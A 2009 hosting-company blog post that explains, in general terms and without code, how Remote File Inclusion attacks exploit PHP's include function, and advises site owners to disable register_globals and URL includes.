An Awe-Inspiring Website Attack: RFI

Posted on May 10, 2009 by Northland Digital

RFI stands for Remote File Inclusion. We’ve seen some captured demos here and there, but this one is one of the most impressive yet. The example shown in the post Bots Galore! is worth reading – in fact, studying! Look how it ends, with a simple GUI for controlling your site. Chances are, there’s eight or nine of these scripts floating around on underground file sharing networks right now.

Wikipedia gives an excellent description of the RFI attack. Briefly, you used PHP’s “include” function to include whatever file was specified after the ‘?’ prompt in the URL. Guess what? We’ll just include our own file from some other server there and look at your web page that way! No password cracking, no muss, no fuss, and not even any trace left.

Guard against this! Turn off “register_global” on your server if it isn’t off already, and just plain don’t allow URL-include in the first place. If you have several pages of code that have to link together, include the file specifically by name in the code itself.

Peter Brittain

This entry was posted in Website Hosting and tagged , , . Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *

*

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

  • quote

  • Contacts

    Perth: 08.6102.1222
    Sydney: 02.8011.3444
    Bali: 0853.33 99 1834
    Hong Kong: 852.8127.9299

  • Archives

Blog Posts

  • Is It Time To Be Afraid of ACTA Yet?

    It only looks to involve the US and UK/EU at this point, but the broad plans of ACTA, the international Anti-Counterfeiting Trade Agreement, look like they could eventually become a de-facto standard for the whole wide world of e-commerce. TechDirt … Continue reading